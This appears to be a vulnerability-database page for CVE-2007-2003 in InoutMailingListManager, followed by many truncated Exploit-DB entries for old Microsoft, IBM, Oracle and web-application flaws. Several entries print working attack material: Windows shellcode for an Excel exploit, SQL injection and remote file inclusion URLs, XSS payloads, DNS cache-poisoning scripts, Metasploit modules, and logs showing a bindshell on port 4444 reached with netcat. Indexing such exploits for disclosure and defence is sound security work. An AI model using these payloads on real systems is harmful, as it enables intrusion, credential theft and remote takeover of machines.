CVE-2007-2003
Published: 2007-04-12
Priority: P3 · 37 · medium · CVSS 2.0 base score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Tags: EXPLOIT
EPSS: 2.01% (78.4th percentile)
InoutMailingListManager 3.1 and earlier sends a Location redirect header but does not exit after an authorization check fails, which allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by ignoring the redirect.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inoutmailinglistmanager | inoutmailinglistmanager | <= 3.1 | — |
GHSA
GHSA-3fwh-xpjw-6p29: CVE-2007-2003 [MEDIUM] InoutMailingListManager 3.1 and earlier
ghsa_unreviewed·2022-05-01
Citrix
CVE-2007-0108 [MEDIUM] · vendor_citrix · 2007-01-09 · CVSS 6.0
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles.
No detection rules found.
Exploit-DB
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
exploitdb·2020-03-03
---
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2020-03-02
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
Older versions are also vulnerable.
Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual:
h
Exploit-DB
GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
exploitdb·2020-02-24
---
# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2019-11-03
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass Copy to file -> Save as eclasstestlogin)
4) Load the file to SQLMap with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=te
Exploit-DB
CVE-2007-0213 Microsoft Exchange 2003 - base64-MIME Remote Code Execution
exploitdb·2019-07-05
---
# Python 2.7 (included with ImmunityDBG)
# Exchange 2003 SP0 base64-MIME memory corruption
# NSA's `ENGLISHMANSDENTIST`
# Platform: Windows Server 2003 R2
# Shout out to the Equation Group, NSA Tailored Access Operations
# Author: Charles Truscott @r0ss1n1
# Shout out to Offensive Security, from Australia with Love
import time
import socket
import base64
import struct
#payload ="eJ8+InlpAQaQCAAEAAAAAAABAAEAAgKQBgAOAAAAAAAAAAAAAAAAAAAAAAAAAAIFkAYAevwAAAEA" + "\r\n"
#payload+="AAANAAE3AQAAAGr8AAALAAAAAAAAAMAAAAAAAABG0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAD" + "\r\n"
#payload+="AP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAEAAA/v///wAAAAD+////AAAAAAAAAAD/////" + "\r\n"
#payload+="//////////////////////////////////////////////////////
Exploit-DB
Microsoft Word 2007 (x86) - Information Disclosure
exploitdb·2017-09-30
---
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the
Exploit-DB
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
exploitdb·2017-09-28
---
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability
Date: September 28th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Groove contains a security bypass issue regarding 'Workspace Shortcut' files (.GLK)
because it allows arbitrary (registered) URL Protocols to be passed, when only 'grooveTelespace://' URLs
should be allowed, which allows execution of arbitrary code upon opening a 'GLK' file.
Usually, URLs are passed to web browsers, but because it uses 'ShellExecute()', i
Exploit-DB
CVE-2015-2523 Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free
exploitdb·2015-09-16
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=462
The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with application verifier basic checks enabled.
Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls
The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord.
File versions:
Exploit-DB
CVE-2015-2467 Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)
exploitdb·2015-08-21
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versi
Exploit-DB
CVE-2015-0097 [CRITICAL] Microsoft Word - Local Machine Zone Code Execution (MS15-022)
exploitdb·2015-07-20·CVSS 9.3
---
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: CVE-2015-0097
Original Advisory: https://technet.microsoft.com/library/security/ms15-022
Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible
to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context
of the local machine zone of Internet Explorer which leads to arbitrary code execution.
By persuading users into opening eg. specially crafted .WPS,
Exploit-DB
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
exploitdb·2014-09-29
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb·2010-08-21·CVSS 7.8
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerable application MS Office 2003/2007
#Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
shellcode = (
b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
b"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
b"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
b"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
b"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
b"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
b"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
b"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
b"\x
Exploit-DB
CVE-2007-3336 [CRITICAL] CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)
exploitdb·2010-08-14·CVSS 10.0
---
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py "
print "Vulnerable Serv
Exploit-DB
CVE-2007-4592 IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2008-03-19
---
source: https://www.securityfocus.com/bid/28296/info
IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input.
An attacker could exploit these vulnerabilities to execute arbitrary local or remote script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Rational ClearQuest 2003.06.16, 7.0.0.1, 7.0.0.2, 7.0.1.0, and 7.0.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('
Exploit-DB
CVE-2007-6127 project alumni 1.0.9 - Cross-Site Scripting / SQL Injection
exploitdb·2007-11-24
---
project-alumni sql injection & xss
author : tomplixsee
[email protected]
affected software version : project alumni v1.0.9, v1.0.8, or lower??
download : https://sourceforge.net/projects/project-alumni/
vulnerability
1.sql injection
++++++++++++++++
condition: magic_quotes_gpc = off
vulnerable code on view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");
reason: bad filtering
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
result example:
+--------------------------------------------------------------------------
Exploit-DB
CVE-2007-6026 Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow
exploitdb·2007-11-16
---
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
Summary:
A remote code execution vulnerability exists in Microsoft Jet
Engine. A remote attacker who successfully exploits this vulnerability
can execute arbitrary code on the affected system.
Affected Software Versions:
Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
(Other versions may also be affected)
How to Reproduce:
Open the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access
2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please
do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_
Exploit-DB
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb·2007-11-13
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
Exploit-DB
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
CVE-2007-5926 OpenBase 10.0.x - Remote Buffer Overflow / Remote Command Execution
exploitdb·2007-11-05
---
source: https://www.securityfocus.com/bid/26347/info
OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.
An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate in the complete compromise of affected computers.
1. call AsciiBackup('\`id\`')
results in commands being run as root.
desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages
OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.
Using database 'WOMovies' on host 'localhost'
Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.
Exploit-DB
CVE-2007-5780 teatro 1.6 - 'basePath' Remote File Inclusion
exploitdb·2007-10-28
---
# teatro 1.6 Remote File Include Vulnerability
Download script : http://telemat.die.unifi.it/book/2003/Telematica-II/teatro-1.6.tgz
Discovered by : Alkomandoz Hacker
Contact : [email protected]
http://localhost/path/teatro/pub/pub08_comments.php?basePath=shell.txt
# Thanx: AsbMay's Group & City Of Ghosts Team & Sniper-sa Team
# Greetz To: Sniper_Sa & Pal-Hackers & Hack eGy & Dr SeSo & No4Hard & Devil-x & Gold_M
# milw0rm.com [2007-10-28]
Exploit-DB
CVE-2007-4880 IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
exploitdb·2007-10-27
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB
CVE-2007-5587 Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation
exploitdb·2007-10-18
---
source: https://www.securityfocus.com/bid/26121/info
Macrovision SafeDisc is prone to a local privilege-escalation vulnerability because it fails to adequately sanitize user-supplied input.
Exploiting this vulnerability allows local attackers to execute arbitrary malicious code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
UPDATE: This issue affects only Microsoft Windows XP and 2003 platforms. Microsoft Vista is not affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30680.zip
Exploit-DB
CVE-2007-3896 Microsoft Windows - URI Handler Command Execution
exploitdb·2007-10-05
---
source: https://www.securityfocus.com/bid/25945/info
Microsoft Windows XP and Server 2003 with Internet Explorer 7 is prone to a command-execution vulnerability because it fails to properly sanitize input.
Successfully exploiting this issue allows remote attackers to execute arbitrary commands in the context of users that follow malicious URIs.
Known attack vectors include following URIs in these applications:
- Mozilla Firefox in versions prior to 2.0.0.6
- Skype in versions prior to 3.5.0.239
- Adobe Acrobat Reader 8.1
- Miranda 0.7
- Netscape 7.1
- mIRC.
NOTE: Attackers can exploit the issue in BID 25543 (Mozilla Firefox 2.0.0.6 Unspecified Protocol Handling Command Injection Vulnerability) as an attack vector for this issue.
Exploit-DB
CVE-2007-4442 Epic Games Unreal Engine Logging Function - Remote Denial of Service
exploitdb·2007-08-20
---
source: https://www.securityfocus.com/bid/25374/info
The Unreal Engine is prone to a remote denial-of-service vulnerability because the application fails to properly bounds-check user-supplied input.
Successfully exploiting this issue allows remote attackers to corrupt application memory in a manner that causes a crash. Remote code execution may be possible, but this has not been confirmed.
Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 are vulnerable. Given the reuse of the engine in multiple other products, other games and versions are also likely vulnerable.
This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may a
Exploit-DB
CVE-2007-3927 IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow
exploitdb·2007-07-26
---
#!/use/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
Exploit-DB
CVE-2007-3681 WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
exploitdb·2007-07-10
---
/*
WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit
Affected software:
(*) WinPcap versions affected (Confirmed)
- WinPcap 4.0 and previous
(*) WinPcap fixed version (stable) : WinPcap 4.0.1
Note : There was an error in the previous advisory, which tells WinPcap
4.1 is affected, in fact WinPcap 4.1 is the beta version.
(*) Operating systems affected (Confirmed)
- Windows 2000 SP4 (Both server and workstation)
- Windows XP SP2
- Windows 2003 Server
- Windows Vista !!
Description:
It's a well known issue that WinPcap's security model allows non-administrator
users to use its device driver. If they don't manually unload it after using
tools such as Wireshark (Ethereal), which unfortunately often happens, this
can
Exploit-DB
CVE-2007-3490 Microsoft Excel 2000/2003 - Sheet Name (PoC)
exploitdb·2007-06-27
---
Vuln Exposed by: ZhenHan.Liu
Team: Ph4nt0m Security Team
http://www.ph4nt0m.org
Tested on: Full Patched Excel 2003 Sp2, CN
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip)
# milw0rm.com [2007-06-27]
Exploit-DB
CVE-2007-3334 [CRITICAL] Ingress Database Server 2.6 - Multiple Remote Vulnerabilities
exploitdb·2007-06-21·CVSS 10.0
---
source: https://www.securityfocus.com/bid/24585/info
Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337
Exploit-DB
CVE-2007-3236 XOOPS Module horoscope 2.0 - Remote File Inclusion
exploitdb·2007-06-12
---
BeyazKurt - [email protected]
XOOPS Modules Horoscope
http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
modules/horoscope/footer.php?xoopsConfig[root_path]=
{NetLife Since : '2003-4'}
Retired hacker BeyazKurt - I've left the net! The comeback will be perfect ;(
# milw0rm.com [2007-06-12]
Exploit-DB
CVE-2007-2531 Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion
exploitdb·2007-05-07
---
#Berylium2 Remote file inclusion
#Download script : http://berylium.org/source/be2-2003-08-18.tar.gz
#Thanks Str0ke
#Exploit :
#http://victim.com/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger[at]hotmail[dot]com
#Greetz : ™~${{BraveHeart}}$~™
# milw0rm.com [2007-05-07]
Exploit-DB
CVE-2007-1748 Microsoft Windows - DNS RPC Remote Buffer Overflow (2)
exploitdb·2007-04-18
---
Exploit v2 features:
- Target Remote port 445 (by default but requires auth)
- Manual target for dynamic tcp port (without auth)
- Automatic search for dynamic dns rpc port
- Local and remote OS fingerprinting (auto target)
- Windows 2000 server and Windows 2003 server (Spanish) supported by default
- Fixed bug with Windows 2003 Shellcode
- Universal local exploit for Win2k (automatic search for opcodes)
- Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
- Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
- Microsoft RPC api used ( who cares? :p )
D:\Programación\DNSTEST>dnstest
Microsoft Dns Server local & remote
Exploit-DB
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
CVE-2007-1675 IBM Lotus Domino Server 6.5 - Remote Overflow
exploitdb·2007-03-31
---
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# [email protected]
# http://www.offensive-security.com
# Notes:
# * Not for the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMD
Exploit-DB
Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
exploitdb·2007-02-25
CVE-2007-1090 Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
---
source: https://www.securityfocus.com/bid/22715/info
Microsoft Windows Explorer is prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting a malicious file to a victim user. Users do not have to open the file -- simply browsing a folder containing the malicious file is sufficient to trigger this issue.
A successful exploit will crash the vulnerable application, effectively denying service.
This issue may be related to BID 19365 (Microsoft Windows GDI32.DLL WMF Remote Denial of Service Vulnerability) or BID 21992 (Microsoft Windows Explorer WMF File Denial of Service Vulnerability).
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by AzM";
prin
Exploit-DB
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
exploitdb·2007-02-22
CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Exploit-DB
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
exploitdb·2007-02-13·CVSS 5.0
CVE-2006-5229 [MEDIUM] Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
---
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears
Exploit-DB
Microsoft Word 2000 - Code Execution
exploitdb·2007-02-03
CVE-2007-0515 Microsoft Word 2000 - Code Execution
---
############ use at your own risk *******
+ Title: Microsoft Word 2000 Unspecified Code Execution Vulnerability Exploit (0-day)
+ code by xCuter (BongGoo Kang - [email protected])
+ Critical: High Critical
+ Impact: MS Word 2000 -> Could Allow Arbitrary Command Execution
MS word 2003 -> Attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
+ Tested Software: Microsoft(R) Word 2000 (9.0.2720)
+ Solution: Not Patched (zero-day)
+ Description:
When a user opens a specially crafted Word file using a malformed string,
it may corrupt system memory in such a way that an attacker could execute arbitrary code
Exploit-DB
Microsoft Word 2000 - Malformed Function Code Execution
exploitdb·2007-01-25
CVE-2007-0515 Microsoft Word 2000 - Malformed Function Code Execution
---
source: https://www.securityfocus.com/bid/22225/info
